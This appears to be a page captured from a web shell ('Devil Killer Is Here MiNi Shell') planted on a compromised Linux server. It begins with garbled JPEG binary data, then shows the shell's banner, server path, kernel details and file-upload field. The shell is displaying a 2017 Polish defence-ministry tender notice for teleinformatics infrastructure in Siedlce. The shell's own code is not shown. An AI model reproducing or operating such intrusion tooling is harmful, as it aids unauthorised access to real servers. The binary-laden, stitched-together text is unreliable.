JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170126/14822-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.rczsiut.wp.mil.pl' target='_blank'>http://www.rczsiut.wp.mil.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 14822 - 2017
              z dnia 2017-01-26 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Budowa infrastruktury teleinformatycznej na potrzeby WOT w  kompleksie wojskowym w Siedlcach  przygotowanie dokumentacyjne wraz z wykonaniem robót budowlanych. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Resortowe Centrum Zarządzania Sieciami i Usługami , krajowy numer identyfikacyjny
              140338549, ul.
              ul. Żwirki i Wigury 
              9/13,
              00-909 
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              261 847 818, e-mail
              rczsiut.szp@ron.mil.pl, faks
              261 847 145.
              <br />
              Adres strony internetowej (URL): www.rczsiut.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka Organizacyjna Skarbu Państwa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.rczsiut.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  tak
                <br />rczsiut.wzpir@ron.mil.pl</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Wymagane jest przygotowanie wniosku i oferty w formie pisemnej. Zamawiający nie dopuszcza możliwości składania wniosków i ofert w formie elektronicznej.<br />
                Adres:
                <br />Resortowe Centrum Zarządzania Sieciami i Usługami Teleinformatycznymi , ul. Żwirki i Wigury 9/13,  00-909 Warszawa, blok nr 30, pokój nr 210 A-B</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa infrastruktury teleinformatycznej na potrzeby WOT w  kompleksie wojskowym w Siedlcach  przygotowanie dokumentacyjne wraz z wykonaniem robót budowlanych. <br /><b>Numer referencyjny: </b>17/1/243/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>. Zakres zamówienia obejmuje
Przedmiotem zamówienia jest opracowanie dokumentacji projektowej a następnie wykonanie robót instalacyjno-budowlanych obejmujących zakres zawarty w programie funkcjonalno-użytkowym w m. Siedlce.
I.   Opracowanie dokumentacyjne winno uwzględniać:
1.	Projekty wykonawcze (wykonane w 4 egz.).
Projekty wykonawcze należy uzgodnić z: 
	Dowódcą Garnizonu Siedlce (Dowódca JW 1230);
	Dowódcą 23 Bazy Lotnictwa Taktycznego; 
	Szefem Stołecznego Zarządu Infrastruktury;
	Szefem Centrum Wsparcia Teleinformatycznego SZ;
	Szefem Regionu Wsparcia teleinformatycznego w Olsztynie;
	Rzeczoznawcą ds. ochrony p.poż.
2.	Przedmiar robót  w  1 egzemplarzu.
3.	Zestawienie Kosztów Zadania (ZKZ) - sporządzone zgodnie z Decyzją Nr 7/MON (Dz. Urz. MON nr 1 poz. 6  załącznik Nr 29) z dnia 14 stycznia 2008 r. w sprawie zasad opracowywania i realizacji centralnych planów rzeczowych wraz z dołączoną analizą porównawczą wskaźników kosztów jednostkowych sporządzoną wg zasad określonych 
w załączniku Nr 30 do ww. decyzji, wykonany w 1 egz.
4.	Oświadczenie Wykonawcy o:
	kompletności dokumentacji projektowej,
	zgodności projektu budowlanego z obowiązującymi przepisami, zasadami wiedzy technicznej i kompletny z punktu widzenia celu, któremu ma służyć,
	zgodności dokumentacji projektowej z obowiązującymi przepisami, zasadami wiedzy technicznej i kompletności z punktu widzenia celu, któremu mają służyć,
	zgodności dokumentacji projektowej z Ustawą Prawo Zamówień Publicznych
i aktami wykonawczymi do tej ustawy.
Ww. dokumenty, powinny być dodatkowo wykonane na nośniku elektronicznym (np. płyta CD. Wersja elektroniczna dokumentacji powinna być zapisana w formacie PDF.  Rysunki, schematy z możliwością edycji w formacie DWG).
Dokumenty, o których mowa w ppkt. 1 powinny być wykonane zgodnie z Obwieszczeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 24 września 2013 r. 
w sprawie ogłoszenia jednolitego tekstu rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 
z 2013 r. poz. 1129).

III.  Wykonanie robót, poprzedzone akceptacją przez Zamawiającego ww. opracowań (zgodnie 
z zakresem zawartym w programie funkcjonalno-użytkowym).

IV.   Wykonanie:
a)	dokumentacji powykonawczej (plus wersja elektroniczna) w 4 egz. zawierającej: 
	krótki opis zrealizowanego zadania;
	rysunki i schematy wykonanej kanalizacji teletechnicznej, kablowej sieci magistralnej i rozdzielczej, sieci strukturalnych itd. wraz z krótkim opisem zastosowanych technologii w ich realizacji;
	zestawienie podstawowych materiałów i urządzeń zawierające:
	pełną nazwę,
	typ/rodzaj,
	symbol katalogowy producenta urządzenia,
	numer seryjny,
	jednostkę miary,
	ilość,
	protokoły badań i sprawdzeń; 
	deklaracje zgodności lub certyfikaty zgodności wbudowanych materiałów;
	kartę gwarancyjną wraz z formularzem zgłoszenia awarii, uszkodzenia;
	karty katalogowe/wyrobu wbudowanych materiałów i urządzeń w wersji elektronicznej;
b)	zmian w dokumentacji projektowej podstawowej z naniesionymi zmianami dokonanymi w trakcie realizacji prac w 1 egz.;
c)	dokumentacji pomiarowej w 1 egz. wraz z kopią na nośniku elektronicznym (w formacie miernika - dla pomiarów reflektometrycznych światłowodowych OTDR
 i okablowania strukturalnego);
d)	kosztorysu powykonawczego, w 1 egz.;
e)	instrukcji eksploatacji, obsługi oraz zasady serwisowania urządzeń dostarczonych 
w ramach zadania;
f)	zestawienia ilościowo-wartościowego (zgodnie z przekazanym wzorem) podstawowych materiałów i urządzeń opracowanego w wersji elektronicznej 
w programie excel. 

Program Funkcjonalno - Użytkowy będzie załącznikiem do SIWZ, nie zostanie jednak udostępnione na stronie internetowej wraz z SIWZ ze względu na zawartość wrażliwych informacji o charakterze poufnym i zostanie przekazany wraz zaproszeniem do składania ofert  tylko tym Wykonawcom ubiegającym się o przedmiot zamówienia, którzy potwierdzą spełnienie wymaganych przez Zamawiającego warunków udziału w postępowaniu, spełnią kryteria selekcji oraz wykażą  brak podstaw wykluczenia.
Zamawiający na podstawie treści art. 29 ust. 3a ustawy Pzp żąda od Wykonawców na etapie składania Wniosku w sprawie zakwalifikowania do udziału w postępowaniu przetargowym przedstawienia (załącznik nr 5) imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób, oraz wpisaniu pozostałych danych wymienionych w załączniku nr 5 i oświadcza, 
że w przypadku wyboru jego oferty i realizacji przez niego na podstawie zawartej 
z Zamawiającym umowy zamówienia, zatrudni/zatrudnia na umowę o pracę (na cały czas trwania realizacji zamówieni) osoby wykazane w załączniku nr 5 do wniosku, które będą wykonywać następujące czynności przy realizacji zamówienia:
a)	 pełnienie funkcji pełnomocnik OIN;
b)	przy budowie okablowania strukturalnego wraz z wydzielonym zasilaniem;
c)	przy montażu klimatyzatora; 
d)	przy wymianie drzwi.
Wykonawca z którym zostanie zawarta umowa po wyborze oferty w terminie 10 dni od daty podpisania umowy przedstawi oryginały oświadczeń pracowników wykonujących czynności opisane powyżej - litery od a) do d), że są zatrudnieni na podstawie umowy o pracę 
w rozumieniu przepisów Ustawy z dnia 25 czerwca 1974 r. Kodeks Pracy, z uwzględnieniem minimalnego wynagrodzenia za pracę, ustalonego na podstawie art. 2 ust. 3-5 Ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, przez cały okres realizacji przedmiotu zamówienia.
Sposób kontroli spełniania warunku zatrudnienia na umowę o pracę przez wykonawcę, którego oferta zostanie wybrana i z którym zamawiający podpisze umowę na wykonanie przedmiotu zamówienia, opisany został w SIWZ w części II. 
<br /><br /><b>II.5) Główny kod CPV: </b>45314320-0<br /><b> Dodatkowe kody CPV:</b>45311200-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              204276.08<br />
              Waluta:
              <br /><div style="padding-left: 20px">zł.<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 135<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Określenie warunków: O udzielenie zamówienia może ubiegać się Wykonawca, który nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie treści art. 24 ust. 1, ust 5 pkt 1 i 4 Ustawy Prawo zamówień publicznych. Wykonawca potwierdzi fakt spełnieniu warunku udziału i nie podleganiu wykluczeniu poprzez złożenie oświadczenia na podstawie treści art. 25a ust. 1 Ustawy Pzp. 
Wykonawca spełni warunek posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej wynikającej z odrębnych przepisów na podstawie treści art. 22 ust. 1b ustawy Pzp żądanych przez zamawiającego, jeśli złoży stosowne pisemne oświadczenie 
o posiadaniu systemu teleinformatycznego umożliwiającego przetwarzanie informacji niejawnych o klauzuli co najmniej zastrzeżone spełniające wymagania określone w ustawie 
z dn. 05 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r. nr 182 poz. 1228) oraz Rozporządzeniu Prezesa Rady Ministrów z dn. 20 lipca 2011 r. w sprawie podstawowych wymagań bezpieczeństwa sieci i systemów teleinformatycznych (Dz. U. z 2011 r., nr 159 poz. 948). 
Informacje dodatkowe: Ocena potwierdzenia czy wykonawca wykazał spełnienie ww. warunków udziału na dzień składania wniosku nastąpi na podstawie złożonych Oświadczeń. 
Z ww. dokumentów musi wynikać, że wykonawca spełnia warunek udziału na dzień składania wniosku.Szczegółowe wymagania jakie musi spełnić Wykonawca ubiegający się o przedmiot zamówienia w zakresie ochrony informacji niejawnych zawarte są w załączniku nr 2 do Ogłoszenia o zamówieniu i w SIWZ.


<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Określenie warunków: 
Zamawiający żąda w celu potwierdzenia spełnienia przez Wykonawcę warunków udziału 
w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub zawodowej następujących dokumentów:
1) w zakresie opracowania dokumentacji projektowej: wykazania się wykonaniem 
i że zakończył w okresie (nie wcześniej) niż ostatnie 3 lata przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie co najmniej dwóch dokumentacji projektowych (projekt budowlany, projekt wykonawczy, przedmiar robót) obejmujących swoim zakresem budowę budynkowych sieci strukturalnych z wydzielona instalacja elektryczną o wartości min. 150 000,00 zł. ( bez podatku VAT), wraz z podaniem ich wartości, przedmiotu, dat wykonania 
i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane należycie, przy czym dowodami 
o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a jeżeli z uzasadnionej przyczyny 
o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów
  oświadczenie wykonawcy; 
2) w zakresie wykonania robót budowlanych: w okresie ostatnich 5 lat przed upływem terminu składania  wniosków o dopuszczenie do udziału postępowaniu a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej 2 roboty budowlane obejmujące swoim zakresem budowę budynkowych sieci strukturalnych z wydzielona instalacją elektryczną 
o wartości min. 150 000,00 zł. (bez podatku VAT),  wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty;.
Wykonawca musi  wykazać, że dysponuje lub  będzie dysponował osobami, które skieruje do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
1)	Projektant  posiadający prawo do pełnienia samodzielnych funkcji w budownictwie tj. uprawnienia budowlane do projektowania obiektu budowlanego w specjalności  telekomunikacyjnej (co najmniej) w ograniczonym zakresie uprawniające do projektowania obiektu budowlanego wraz z infrastrukturą telekomunikacyjną 
w odniesieniu do obiektu budowlanego, takiego jak: lokalne linie i instalacje, wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2013 r., poz. 1409) lub odpowiednie uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów w zakresie odpowiadającym uprawnieniom w specjalności telekomunikacyjnej uprawniające do projektowania obiektu budowlanego w zakresie telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą.
2)	Projektant  posiadający prawo do pełnienia samodzielnych funkcji w budownictwie tj. uprawnienia budowlane do projektowania obiektu budowlanego w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych, bez ograniczeń, wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2013 r., poz. 1409) lub odpowiednie uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów w zakresie odpowiadającym uprawnieniom w specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń elektrycznych  i elektroenergetycznych bez ograniczeń;
3)	Kierownik budowy powinien - posiadać prawo do pełnienia samodzielnych funkcji 
w budownictwie, tj. uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych bez ograniczeń wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiednie uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów w zakresie odpowiadającym uprawnieniom w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, bez ograniczeń; 
4)	kierownik robót - posiadać prawo do pełnienia samodzielnych funkcji w budownictwie, 
tj. uprawnienia budowlane do kierowania robotami w specjalności telekomunikacyjnej (co najmniej) w ograniczonym zakresie uprawniające do kierowania robotami budowlanymi związanymi z obiektem budowlanym wraz z infrastrukturą telekomunikacyjną, w odniesieniu do obiektu budowlanego, takiego jak: lokalne linie i instalacje, wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r., poz. 1409) lub odpowiednie uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów w zakresie odpowiadającym uprawnieniom w specjalności telekomunikacyjnej bez ograniczeń uprawniające do kierowania robotami budowlanymi w zakresie telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą;
       5) 	monterzy w specjalnościach: monter telekomunikacyjnych linii kablowych, 
            elektromonter;
       6)	instalatorzy okablowania strukturalnego: posiadający certyfikat producenta systemu   
           okablowania strukturalnego;
       7) pracownicy budowlani;

Prawo do pełnienia samodzielnych funkcji technicznych w budownictwie określone dla kierownika budowy i kierownika robót, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych tj. m.in. w ustawie z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych w państwach członkowskich Unii Europejskiej (Dz.U. nr 63 poz. 394) oraz ustawie z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2013 r. poz. 932 z póź. zm.). 

Wszystkie wymienione osoby przewidziane do realizacji przedmiotu zamówienia  muszą 
legitymować się pisemnym upoważnieniem kierownika przedsiębiorcy do dostępu do informacji niejawnych o klauzuli zastrzeżone (jeżeli nie posiadają poświadczenia bezpieczeństwa upoważniającego do dostępu do informacji niejawnych o klauzuli co najmniej zastrzeżone) oraz zaświadczeniem o odbyciu szkolenia w zakresie ochrony informacji niejawnych  zgodnie z opisem zawartym w załączniku nr 2 do Ogłoszenia o zamówieniu opublikowanym na stronie internetowej zamawiającego. Zamawiający nie dopuszcza możliwości zmiany osób, które wykaże Wykonawca jako zdolne do wykonania przedmiotu zmówienia w celu potwierdzenia spełnienia warunku udziału w załączniku do Wniosku chyba, że na etapie realizacji przedmiotu zamówienia po dostatecznym uzasadnieniu przyczyny, na wniosek Wykonawcy zostanie przedstawiona inna osoba, która będzie spełniała wszystkie kryteria jakie wynikały 
z wcześniejszych wymagań określonych przez zamawiającego w Ogłoszeniu o zamówieniu
 i zgodzi się na nią Zamawiający.
Zamawiający nie wyraża zgody na łączenie przez jedna osobę funkcji kierownika budowy
 i kierownika robót.
Zamawiający na podstawie treści art. 36a ust. 2 pkt 1 ustawy Pzp zastrzega obowiązek osobistego wykonania przez wykonawcę kluczowych części zamówienia na roboty budowlane polegające na budowie okablowania strukturalnego z wydzielona instalacja elektryczną
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                 Wymagane informacje zawarte zostały w Ogłoszeniu o zamówieniu 
w poz. II.4.II) Krótki opis przedmiotu zamówienia i Załączniku nr  5 wzór nr 4 do Wniosku w sprawie zakwalifikowania do udziału w postępowaniu przetargowym 
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
